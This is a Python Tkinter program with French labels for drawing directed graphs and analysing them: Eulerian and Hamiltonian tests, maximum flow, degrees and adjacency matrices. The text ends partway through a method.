# NOTE(review): the two lines below are dataset-export residue (a markdown
# table header), not Python; commented out so the file parses.
# text string | size int64 | token_count int64 |
# |---|---|---|
##################################################
# Importation des Bibliotheques et fonctions:
from collections import defaultdict
from collections import deque
import tkinter as tk
from tkinter import *
from tkinter import PhotoImage
from tkinter import ttk

from PIL import ImageGrab
class Euler:
    """Classify an undirected (multi)graph as Eulerian, semi-Eulerian or neither.

    Vertices are the integers ``0 .. V-1``; edges are kept in an adjacency
    list where each undirected edge appears in both endpoint lists, so
    ``len(self.graph[v])`` is the degree of ``v``.
    """

    def __init__(self, vertices):
        self.V = vertices               # number of vertices
        self.graph = defaultdict(list)  # adjacency list (parallel edges allowed)

    def addEdge(self, u, v):
        """Add the undirected edge (u, v); stored in both directions."""
        self.graph[u].append(v)
        self.graph[v].append(u)

    def DFSUtil(self, v, visited):
        """Mark every vertex reachable from ``v`` as visited.

        Implemented iteratively with an explicit stack so large graphs
        cannot overflow Python's recursion limit (the original recursed).
        """
        stack = [v]
        while stack:
            node = stack.pop()
            if not visited[node]:
                visited[node] = True
                stack.extend(n for n in self.graph[node] if not visited[n])

    def isConnected(self):
        """Return True if all vertices of non-zero degree are connected.

        Runs a DFS from some vertex of non-zero degree, then checks that
        every vertex carrying an edge was reached.  (Fixes the original
        start-vertex search, which tested ``len(...) > 1`` — skipping
        degree-1 vertices — and relied on the loop index after ``break``,
        so a graph whose only multi-edge vertex was the last one was
        declared connected without any traversal.)
        """
        visited = [False] * self.V
        # Find any vertex with at least one incident edge as the DFS root.
        start = next((i for i in range(self.V) if len(self.graph[i]) > 0), None)
        if start is None:
            # No edges at all: trivially connected.
            return True
        self.DFSUtil(start, visited)
        # Every vertex with edges must have been reached.
        return all(visited[i] or len(self.graph[i]) == 0 for i in range(self.V))

    def isEulerian(self):
        """Return 0 (not Eulerian), 1 (Euler path) or 2 (Euler circuit).

        Classical criterion: the non-zero-degree vertices must be
        connected, and the number of odd-degree vertices must be 0
        (circuit) or 2 (path).  In an undirected graph the odd count is
        always even, so no other outcome is possible.
        """
        if not self.isConnected():
            return 0
        odd = sum(1 for i in range(self.V) if len(self.graph[i]) % 2 != 0)
        if odd == 0:
            return 2
        if odd == 2:
            return 1
        return 0

    def test(self):
        """Return a French human-readable description of the classification."""
        res = self.isEulerian()
        if res == 0:
            return "Le graphe n'est pas eulerien"
        if res == 1:
            return "Le graphe comporte un chemain eulerien"
        return "Le graphe comporte un cycle eulerien"
class Hamilton():
    """Hamiltonian-cycle detector over an adjacency-matrix graph.

    ``graph[u][v] == 1`` means there is an edge between ``u`` and ``v``.
    Callers typically overwrite ``self.graph`` wholesale after construction.
    """

    def __init__(self, vertices):
        # Square zero matrix; replaced by the caller with the real adjacency.
        self.graph = [[0] * vertices for _ in range(vertices)]
        self.V = vertices

    def isSafe(self, v, pos, path):
        """Return True when ``v`` may be placed at index ``pos`` of ``path``.

        It must be adjacent to the previously placed vertex and must not
        already appear on the partial path.
        """
        previous = path[pos - 1]
        if self.graph[previous][v] == 0:
            return False
        return v not in path[:pos] and v not in path[pos:]

    def hamCycleUtil(self, path, pos):
        """Backtracking search extending the partial cycle at index ``pos``."""
        if pos == self.V:
            # Every vertex is placed: a cycle exists iff the last vertex
            # connects back to the starting one.
            return self.graph[path[pos - 1]][path[0]] == 1
        # Vertex 0 is fixed as the start (see hamCycle), so candidates
        # begin at 1.
        for candidate in range(1, self.V):
            if self.isSafe(candidate, pos, path):
                path[pos] = candidate
                if self.hamCycleUtil(path, pos + 1):
                    return True
                path[pos] = -1  # undo: this candidate leads nowhere
        return False

    def hamCycle(self):
        """Search for a Hamiltonian cycle; return a French result string."""
        path = [-1] * self.V
        # In an undirected graph a Hamiltonian cycle, if any, can be
        # rotated to start anywhere — so pin vertex 0 first.
        path[0] = 0
        if not self.hamCycleUtil(path, 1):
            return "Le graphe n'est pas hamiltonien"
        return self.printSolution(path)

    def printSolution(self, path):
        """Format the found cycle, repeating the start vertex at the end."""
        resultat = "Le graphe est hamiltonien: "
        resultat += "".join(str(vertex) + " " for vertex in path)
        resultat += str(path[0])
        return resultat
##########################################
class Max_flow:
    """Maximum flow via Ford-Fulkerson with BFS augmenting paths (Edmonds-Karp).

    ``graph`` is a square capacity matrix; it is treated as the residual
    graph and is MUTATED in place by :meth:`FordFulkerson`.
    """

    def __init__(self, graph):
        self.graph = graph        # residual capacity matrix (mutated in place)
        self.ROW = len(graph)     # number of vertices

    def BFS(self, s, t, parent):
        """Return True if the residual graph has an s->t path.

        Side effect: fills ``parent`` so the path can be walked back from
        ``t``.  Uses a deque — the original used ``list.pop(0)``, which is
        O(n) per dequeue and made the BFS accidentally quadratic.
        """
        visited = [False] * self.ROW
        queue = deque([s])
        visited[s] = True
        # Standard BFS over edges with remaining capacity.
        while queue:
            u = queue.popleft()
            for ind, val in enumerate(self.graph[u]):
                if not visited[ind] and val > 0:
                    queue.append(ind)
                    visited[ind] = True
                    parent[ind] = u
        # Reached the sink iff some augmenting path exists.
        return visited[t]

    def FordFulkerson(self, source, sink):
        """Return the maximum flow from ``source`` to ``sink``.

        Repeatedly finds an augmenting path with BFS, pushes the
        bottleneck capacity along it, and updates residual/reverse
        capacities until no path remains.
        """
        parent = [-1] * self.ROW  # filled by BFS with the path tree
        max_flow = 0              # no flow initially
        while self.BFS(source, sink, parent):
            # Bottleneck: minimum residual capacity along the found path.
            path_flow = float("Inf")
            s = sink
            while s != source:
                path_flow = min(path_flow, self.graph[parent[s]][s])
                s = parent[s]
            max_flow += path_flow
            # Push the flow: decrease forward capacities, increase reverse.
            v = sink
            while v != source:
                u = parent[v]
                self.graph[u][v] -= path_flow
                self.graph[v][u] += path_flow
                v = parent[v]
        return max_flow
#################################################################
#                 - Directed graph window -                     #
# ///////////////////////////////////////////////////////////// #
# Description: window for drawing and analysing directed graphs #
# ///////////////////////////////////////////////////////////// #
class GrapheOriente(Tk):
    """Main window for drawing and analysing a DIRECTED graph.

    The user draws vertices with a double left-click and arcs with a
    right-click on each endpoint; the "Traitement" menu runs the analyses
    (order, degrees, adjacency matrix, Eulerian/Hamiltonian tests,
    maximum flow) in modal child windows.

    Instance state:
      i        -- next vertex number to assign
      compt    -- how many endpoints were clicked for the arc in progress
      temp     -- the clicked endpoints ([x, y, oval_id, text_id, number])
      point    -- all drawn vertices, same 5-element layout as temp
      sommets  -- list of vertex numbers
      couple   -- drawn arcs as [from_vertex, to_vertex, weight]
      matrice  -- last adjacency/capacity matrix built from couple
    """
    def __init__(self):
        Tk.__init__(self)  # parent-class constructor
        # Get the size of the computer screen (used to centre the window).
        width=self.winfo_screenwidth()
        height=self.winfo_screenheight()
        self.largeure=900
        self.hauteure=500
        self.x=(width/2)-(self.largeure/2)
        self.y=(height/2)-(self.hauteure/2)
        # Canvas initialisation.
        self.graphe =Canvas(self, width =self.largeure, height =self.hauteure, bg ="white")
        self.geometry('{}x{}+{}+{}'.format(self.largeure,self.hauteure,int(self.x),int(self.y)))
        self.resizable(False,False)
        self.wm_title('Graphe Oriente')
        self.graphe.pack(side =TOP, padx =5, pady =5)
        # Events triggered by mouse clicks: double-click draws a vertex,
        # right-click selects an arc endpoint.
        self.bind("<Double-Button-1>", self.sommet)
        self.bind("<Button-3>", self.arc)
        # Window menu.
        menubar = Menu(self)
        filemenu = Menu(menubar, tearoff = 0)
        filemenu.add_separator()
        filemenu.add_command(label = "Quitter ?", command = self.destroy)
        filemenu.add_command(label = "Sauvegarder", command = self.save)
        menubar.add_cascade(label = "Fichier", menu = filemenu)
        filemenu = Menu(menubar, tearoff = 0)
        filemenu.add_separator()
        filemenu.add_command(label = "Ordre du graphe", command=self.ordre_graphe)
        filemenu.add_command(label = "Degre du sommet", command=self.degres_sommet)
        filemenu.add_command(label = "Matrice d'adjacence", command=self.matriceAdj)
        filemenu.add_command(label = "Successeur du sommet", command=self.successeur)
        filemenu.add_command(label = "Predecesseur du sommet", command=self.predeccesseur)
        filemenu.add_command(label = "Demi degre supperieur du sommet", command=self.demi_deg_sup)
        filemenu.add_command(label = "Demi degre inferieur du sommet", command=self.demi_deg_inf)
        filemenu.add_command(label = "Graphe Hamiltonien ?", command=self.hamilton)
        filemenu.add_command(label = "Graphe Eulerien ?", command=self.euler)
        filemenu.add_command(label = "Flow maximal", command=self.maxflow)
        menubar.add_cascade(label = "Traitement", menu = filemenu)
        filemenu = Menu(menubar, tearoff = 0)
        filemenu.add_separator()
        filemenu.add_command(label = "Tout effacer ?", command =self.delete)
        menubar.add_cascade(label = "Effacer", menu = filemenu)
        # NOTE(review): this Menu is immediately overwritten by the next
        # line and never used.
        filemenu = Menu(menubar, tearoff = 0)
        filemenu = Menu(menubar, tearoff = 0)
        filemenu.add_command(label = "Aide", command =self.aide)
        menubar.add_cascade(label = "Aide", menu = filemenu)
        # NOTE(review): created but never attached to the menubar.
        filemenu = Menu(menubar, tearoff = 0)
        self.config(menu = menubar)
        # Shared state (see class docstring).
        self.i=int(0)
        self.compt=int()
        self.temp=list()
        self.connect=list()  # NOTE(review): appears unused in this class
        self.point=list()
        self.sommets=list()
        self.couple=list()
        self.matrice=list()
        self.var=StringVar()
        self.entier=int()
    def delete(self):
        """Clear the canvas and reset all graph state to its initial values."""
        for element in self.graphe.find_all():
            self.graphe.delete(element)
        self.i=int(0)
        self.compt=int()
        self.temp=list()
        self.connect=list()
        self.point=list()
        self.sommets=list()
        self.couple=list()
        self.matrice=list()
        self.var=StringVar()
        self.entier=int()
        pass
    # Function used to close a modal child window and re-enable the main one.
    def Close_Toplevel (self):
        self.compt=int()
        self.temp=list()
        self.wm_attributes("-disable",False)  # re-enable the main window
        self.toplevel_dialog.destroy()
        self.deiconify()
    # Close the save dialog: grab the canvas area as a PNG under save/,
    # using the entered name or "Graphe" as a default.
    def Close_Save (self,event=None):
        if len(self.var.get())>0:
            # Screen coordinates of the canvas; inset by 2px to skip the border.
            x=self.graphe.winfo_rootx()
            y=self.graphe.winfo_rooty()
            w=self.graphe.winfo_width()
            h=self.graphe.winfo_height()
            image=ImageGrab.grab((x+2,y+2,x+w-2,y+h-2))
            image.save("save/{}.png".format(self.var.get()))
        else:
            # No name given: fall back to the default file name.
            x=self.graphe.winfo_rootx()
            y=self.graphe.winfo_rooty()
            w=self.graphe.winfo_width()
            h=self.graphe.winfo_height()
            image=ImageGrab.grab((x+2,y+2,x+w-2,y+h-2))
            image.save("save/Graphe.png")
        self.wm_attributes("-disable",False)
        self.toplevel_dialog.destroy()
        self.deiconify()
    def aide(self):
        """Open the modal help window describing the mouse bindings."""
        self.wm_attributes("-disable",True)  # make the dialog modal
        self.toplevel_dialog=tk.Toplevel(self)
        self.toplevel_dialog.minsize(600,150)
        self.toplevel_dialog.wm_title("Aide")
        # Centre the dialog on screen.
        width=self.toplevel_dialog.winfo_screenwidth()
        height=self.toplevel_dialog.winfo_screenheight()
        largeure=600
        hauteure=150
        x=(width/2)-(largeure/2)
        y=(height/2)-(hauteure/2)
        self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
        self.toplevel_dialog.transient(self)
        self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
        self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
        self.toplevel_dialog.focus()
        aide="""
        Tracer un sommet: Double clic
        Tracer un arc: clic gauche sur chaque sommet
        """
        self.label=tk.Label(self.toplevel_dialog, text=aide,justify='left',font='Century 13 bold')
        self.label.pack(side='top')
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
        self.yes_button.pack(side='right',fill='x',expand=True)
    # Dialog asking for a file name before saving the drawn graph.
    def save(self):
        """Open the modal save dialog; Close_Save performs the screenshot."""
        self.wm_attributes("-disable",True)
        self.toplevel_dialog=tk.Toplevel(self)
        self.toplevel_dialog.minsize(600,100)
        self.toplevel_dialog.wm_title("Sauvegarder")
        width=self.toplevel_dialog.winfo_screenwidth()
        height=self.toplevel_dialog.winfo_screenheight()
        largeure=600
        hauteure=100
        x=(width/2)-(largeure/2)
        y=(height/2)-(hauteure/2)
        self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
        self.toplevel_dialog.transient(self)
        self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
        self.toplevel_dialog.bind("<Return>", self.Close_Save)
        self.toplevel_dialog.focus()
        self.label=tk.Label(self.toplevel_dialog, text='Entrer le nom de limage: ')
        self.label.pack(side='left')
        # NOTE(review): self.var is rebound from a StringVar to an Entry
        # here; Close_Save relies on Entry.get().
        self.var=tk.Entry(self.toplevel_dialog)
        self.var.pack(side='left')
        self.var.bind("<Return>", self.Close_Save)
        self.var.bind("<Escape>", self.Close_Toplevel)
        self.var.focus_set()
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
        self.yes_button.pack(side='right',fill='x',expand=True)
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_Save)
        self.yes_button.pack(side='right',fill='x',expand=True)
    # Report whether the drawn graph is Eulerian (delegates to class Euler).
    def euler(self):
        """Open a modal window showing the Eulerian classification."""
        self.wm_attributes("-disable",True)
        self.toplevel_dialog=tk.Toplevel(self)
        self.toplevel_dialog.minsize(600,100)
        self.toplevel_dialog.wm_title("Graphe eulerien")
        width=self.toplevel_dialog.winfo_screenwidth()
        height=self.toplevel_dialog.winfo_screenheight()
        largeure=600
        hauteure=100
        x=(width/2)-(largeure/2)
        y=(height/2)-(hauteure/2)
        self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
        self.toplevel_dialog.transient(self)
        self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
        self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
        l=len(self.couple)
        lg=len(self.sommets)
        if lg>=2:
            # Feed every drawn arc (as an undirected edge) to the checker.
            g1 = Euler(lg)
            for i in range(l):
                g1.addEdge(self.couple[i][0],self.couple[i][1])
            self.var=g1.test()
            self.label=tk.Label(self.toplevel_dialog, text=self.var)
            self.label.pack(side='top')
        else:
            # Fewer than two vertices: nothing meaningful to analyse.
            self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
            self.label.pack(side='top')
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
        self.yes_button.pack(side='right',fill='x',expand=True)
    # Report whether the drawn graph is Hamiltonian (delegates to class Hamilton).
    def hamilton(self):
        """Open a modal window showing the Hamiltonian-cycle result."""
        self.wm_attributes("-disable",True)
        self.toplevel_dialog=tk.Toplevel(self)
        self.toplevel_dialog.minsize(600,100)
        self.toplevel_dialog.wm_title("Graphe hamiltonien")
        width=self.toplevel_dialog.winfo_screenwidth()
        height=self.toplevel_dialog.winfo_screenheight()
        largeure=600
        hauteure=100
        x=(width/2)-(largeure/2)
        y=(height/2)-(hauteure/2)
        self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
        self.toplevel_dialog.transient(self)
        self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
        self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
        lg=len(self.couple)
        if lg>1:
            # Build the 0/1 adjacency matrix from the drawn arcs.
            l=len(self.sommets)
            self.matrice=list()
            for i in range(l):
                self.matrice.append([])
                for j in range(l):
                    k=int(0)  # counts arcs i -> j
                    temp=list()
                    temp.append(self.sommets[i])
                    temp.append(self.sommets[j])
                    for element in self.couple:
                        if temp[0]==element[0] and temp[1]==element[1]:
                            self.matrice[i].append(1)
                            k+=1
                    if k==0:
                        self.matrice[i].append(0)
            g1 = Hamilton(l)
            g1.graph = self.matrice
            self.var=g1.hamCycle()
            self.label=tk.Label(self.toplevel_dialog, text=self.var)
            self.label.pack(side='top')
            pass
        else:
            self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
            self.label.pack(side='top')
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
        self.yes_button.pack(side='right',fill='x',expand=True)
    # Dialog asking for source/sink before computing the maximum flow.
    def maxflow(self):
        """Open the modal max-flow dialog; Close_maxflow runs the computation."""
        self.wm_attributes("-disable",True)
        self.toplevel_dialog=tk.Toplevel(self)
        self.toplevel_dialog.minsize(600,200)
        self.toplevel_dialog.wm_title("Flow maximal")
        width=self.toplevel_dialog.winfo_screenwidth()
        height=self.toplevel_dialog.winfo_screenheight()
        largeure=600
        hauteure=200
        x=(width/2)-(largeure/2)
        y=(height/2)-(hauteure/2)
        self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
        self.toplevel_dialog.transient(self)
        self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
        self.toplevel_dialog.focus()
        self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet source: ')
        self.label.grid(row=1)
        self.valeur1=tk.Entry(self.toplevel_dialog)
        self.valeur1.grid(row=1,column=1)
        self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet destination: ')
        self.label.grid(row=2)
        self.valeur2=tk.Entry(self.toplevel_dialog)
        self.valeur2.grid(row=2,column=1)
        self.label=tk.Label(self.toplevel_dialog, text='\n\n')
        self.label.grid(row=3)
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_maxflow)
        self.yes_button.grid(row=4,column=1)
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
        self.yes_button.grid(row=4,column=3)
        pass
    def Close_maxflow (self):
        """Validate the entries, build the capacity matrix and show the flow."""
        lg=len(self.couple)
        # NOTE(review): membership is tested against str(self.sommets), which
        # is fragile for multi-digit vertex numbers — verify.
        if self.valeur1.get() in str(self.sommets) and self.valeur2.get() in str(self.sommets) and lg>0 and self.valeur1.get()!=self.valeur2.get() :
            # Build the capacity matrix from the arcs (element[2] = weight).
            l=len(self.sommets)
            self.matrice=list()
            for i in range(l):
                self.matrice.append([])
                for j in range(l):
                    k=int(0)
                    temp=list()
                    temp.append(self.sommets[i])
                    temp.append(self.sommets[j])
                    for element in self.couple:
                        if temp[0]==element[0] and temp[1]==element[1]:
                            self.matrice[i].append(element[2])
                            k+=1
                    if k==0:
                        self.matrice[i].append(0)
            g = Max_flow(self.matrice)
            src=int(self.valeur1.get())
            des=int(self.valeur2.get())
            self.label=tk.Label(self.toplevel_dialog, text="Le flow maximal est %d " % g.FordFulkerson(src, des))
            self.label.grid(row=6)
        else:
            self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
            self.label.grid(row=6)
        pass
    def matriceAdj(self):
        """Open a modal window displaying the adjacency matrix, one row per label."""
        self.wm_attributes("-disable",True)
        self.toplevel_dialog=tk.Toplevel(self)
        self.toplevel_dialog.minsize(300,300)
        self.toplevel_dialog.wm_title("Matrice D'adjacence")
        width=self.toplevel_dialog.winfo_screenwidth()
        height=self.toplevel_dialog.winfo_screenheight()
        largeure=300
        hauteure=300
        x=(width/2)-(largeure/2)
        y=(height/2)-(hauteure/2)
        self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
        self.toplevel_dialog.transient(self)
        self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
        self.toplevel_dialog.bind("<Return>", self.Close_Toplevel)
        lg=len(self.couple)
        if lg>0:
            l=len(self.sommets)
            self.matrice=list()
            for i in range(l):
                resultat=""  # textual form of row i, e.g. "0 1 0 "
                self.matrice.append([])
                for j in range(l):
                    k=int(0)
                    temp=list()
                    temp.append(self.sommets[i])
                    temp.append(self.sommets[j])
                    for element in self.couple:
                        if temp[0]==element[0] and temp[1]==element[1]:
                            self.matrice[i].append(1)
                            resultat+="1 "
                            k+=1
                    if k==0:
                        self.matrice[i].append(0)
                        resultat+="0 "
                self.label=tk.Label(self.toplevel_dialog, text=resultat)
                self.label.pack(side='top')
            pass
        else:
            self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter")
            self.label.pack(side='top')
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
        self.yes_button.pack(side='right',fill='x',expand=True)
    # Dialog giving the successors of a vertex.
    def successeur(self):
        """Open the modal successor dialog; Close_suc shows the result."""
        self.wm_attributes("-disable",True)
        self.toplevel_dialog=tk.Toplevel(self)
        self.toplevel_dialog.minsize(650,100)
        self.toplevel_dialog.wm_title("Successeur d'un sommet")
        width=self.toplevel_dialog.winfo_screenwidth()
        height=self.toplevel_dialog.winfo_screenheight()
        largeure=650
        hauteure=100
        x=(width/2)-(largeure/2)
        y=(height/2)-(hauteure/2)
        self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
        self.toplevel_dialog.transient(self)
        self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
        self.toplevel_dialog.focus()
        self.toplevel_dialog.bind("<Return>", self.Close_suc)
        self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ')
        self.label.grid(row=1)
        self.valeur=tk.Entry(self.toplevel_dialog)
        self.valeur.grid(row=1,column=1)
        self.valeur.bind("<Return>", self.Close_suc)
        self.valeur.bind("<Escape>", self.Close_Toplevel)
        self.valeur.focus_set()
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
        self.yes_button.grid(row=1,column=6)
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_suc)
        self.yes_button.grid(row=1,column=4)
        pass
    def Close_suc(self):
        """List the vertices reached by arcs leaving the entered vertex."""
        if self.valeur.get() in str(self.sommets):
            resultat=""
            for element in self.couple:
                if self.valeur.get() == str(element[0]):
                    resultat+=str(element[1])+" "
            self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le(s) successeur du sommet {} est: {}'.format(self.valeur.get(),resultat))
            self.toplevel_dialog_label.grid(row=2)
        else:
            self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte')
            self.toplevel_dialog_label.grid(row=2)
    def predeccesseur(self):
        """Open the modal predecessor dialog; Close_pred shows the result."""
        self.wm_attributes("-disable",True)
        self.toplevel_dialog=tk.Toplevel(self)
        self.toplevel_dialog.minsize(650,100)
        self.toplevel_dialog.wm_title("Predecesseur d'un sommet")
        width=self.toplevel_dialog.winfo_screenwidth()
        height=self.toplevel_dialog.winfo_screenheight()
        largeure=650
        hauteure=100
        x=(width/2)-(largeure/2)
        y=(height/2)-(hauteure/2)
        self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
        self.toplevel_dialog.transient(self)
        self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
        self.toplevel_dialog.bind("<Return>", self.Close_pred)
        self.toplevel_dialog.focus()
        self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ')
        self.label.grid(row=1)
        self.valeur=tk.Entry(self.toplevel_dialog)
        self.valeur.grid(row=1,column=1)
        self.valeur.bind("<Return>", self.Close_pred)
        self.valeur.bind("<Escape>", self.Close_Toplevel)
        self.valeur.focus_set()
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
        self.yes_button.grid(row=1,column=6)
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_pred)
        self.yes_button.grid(row=1,column=4)
    def Close_pred(self):
        """List the vertices with an arc pointing to the entered vertex."""
        if self.valeur.get() in str(self.sommets):
            resultat=""
            for element in self.couple:
                if self.valeur.get() == str(element[1]):
                    resultat+=str(element[0])+" "
            self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le(s) predecesseur du sommet {} est: {}'.format(self.valeur.get(),resultat))
            self.toplevel_dialog_label.grid(row=2)
        else:
            self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte')
            self.toplevel_dialog_label.grid(row=2)
    def demi_deg_sup(self):
        """Open the modal out-degree ("demi degre superieur") dialog."""
        self.wm_attributes("-disable",True)
        self.toplevel_dialog=tk.Toplevel(self)
        self.toplevel_dialog.minsize(700,100)
        self.toplevel_dialog.wm_title("Demi degre supperieur d'un sommet")
        width=self.toplevel_dialog.winfo_screenwidth()
        height=self.toplevel_dialog.winfo_screenheight()
        largeure=700
        hauteure=100
        x=(width/2)-(largeure/2)
        y=(height/2)-(hauteure/2)
        self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
        self.toplevel_dialog.transient(self)
        self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
        self.toplevel_dialog.bind("<Return>", self.Close_degre_sup)
        self.toplevel_dialog.focus()
        self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ')
        self.label.grid(row=1)
        self.valeur=tk.Entry(self.toplevel_dialog)
        self.valeur.grid(row=1,column=1)
        self.valeur.bind("<Return>", self.Close_degre_sup)
        self.valeur.bind("<Escape>", self.Close_Toplevel)
        self.valeur.focus_set()
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
        self.yes_button.grid(row=1,column=6)
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre_sup)
        self.yes_button.grid(row=1,column=4)
    def Close_degre_sup(self):
        """Count arcs leaving the entered vertex (its out-degree)."""
        if self.valeur.get() in str(self.sommets):
            k=int(0)
            for element in self.couple:
                if self.valeur.get() == str(element[0]):
                    k+=1
            self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le demi degre supperieur du sommet {} est: {}'.format(self.valeur.get(),k))
            self.toplevel_dialog_label.grid(row=2)
        else:
            self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte')
            self.toplevel_dialog_label.grid(row=2)
    def demi_deg_inf(self):
        """Open the modal in-degree ("demi degre inferieur") dialog."""
        self.wm_attributes("-disable",True)
        self.toplevel_dialog=tk.Toplevel(self)
        self.toplevel_dialog.minsize(700,100)
        self.toplevel_dialog.wm_title("Demi degre inferieur d'un sommet")
        width=self.toplevel_dialog.winfo_screenwidth()
        height=self.toplevel_dialog.winfo_screenheight()
        largeure=700
        hauteure=100
        x=(width/2)-(largeure/2)
        y=(height/2)-(hauteure/2)
        self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
        self.toplevel_dialog.transient(self)
        self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
        self.toplevel_dialog.bind("<Return>", self.Close_degre_inf)
        self.toplevel_dialog.focus()
        self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ')
        self.label.grid(row=1)
        self.valeur=tk.Entry(self.toplevel_dialog)
        self.valeur.grid(row=1,column=1)
        self.valeur.bind("<Return>", self.Close_degre_inf)
        self.valeur.bind("<Escape>", self.Close_Toplevel)
        self.valeur.focus_set()
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
        self.yes_button.grid(row=1,column=6)
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre_inf)
        self.yes_button.grid(row=1,column=4)
    def Close_degre_inf(self):
        """Count arcs entering the entered vertex (its in-degree)."""
        if self.valeur.get() in str(self.sommets):
            k=int(0)
            for element in self.couple:
                if self.valeur.get() == str(element[1]):
                    k+=1
            self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le demi degre inferieur du sommet {} est: {}'.format(self.valeur.get(),k))
            self.toplevel_dialog_label.grid(row=2)
        else:
            self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte')
            self.toplevel_dialog_label.grid(row=2)
    def degres_sommet(self):
        """Open the modal total-degree dialog; Close_degre shows the result."""
        self.wm_attributes("-disable",True)
        self.toplevel_dialog=tk.Toplevel(self)
        self.toplevel_dialog.minsize(600,100)
        self.toplevel_dialog.wm_title("Degre du sommet")
        width=self.toplevel_dialog.winfo_screenwidth()
        height=self.toplevel_dialog.winfo_screenheight()
        largeure=600
        hauteure=100
        x=(width/2)-(largeure/2)
        y=(height/2)-(hauteure/2)
        self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y)))
        self.toplevel_dialog.transient(self)
        self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel)
        self.toplevel_dialog.bind("<Return>", self.Close_degre)
        self.toplevel_dialog.focus()
        self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ')
        self.label.grid(row=1)
        self.valeur=tk.Entry(self.toplevel_dialog)
        self.valeur.grid(row=1,column=1)
        self.valeur.bind("<Return>", self.Close_degre)
        self.valeur.bind("<Escape>", self.Close_Toplevel)
        self.valeur.focus_set()
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel)
        self.yes_button.grid(row=1,column=5)
        self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre)
        self.yes_button.grid(row=1,column=3)
    def Close_degre(self):
        """Count arcs incident to the entered vertex (in + out).

        NOTE(review): the substring test against str(element) may over-count
        when a vertex number appears inside a weight — verify.
        """
        if self.valeur.get() in str(self.sommets):
            k=int(0)
            for element in self.couple:
                if self.valeur.get() in str(element):
                    k+=1
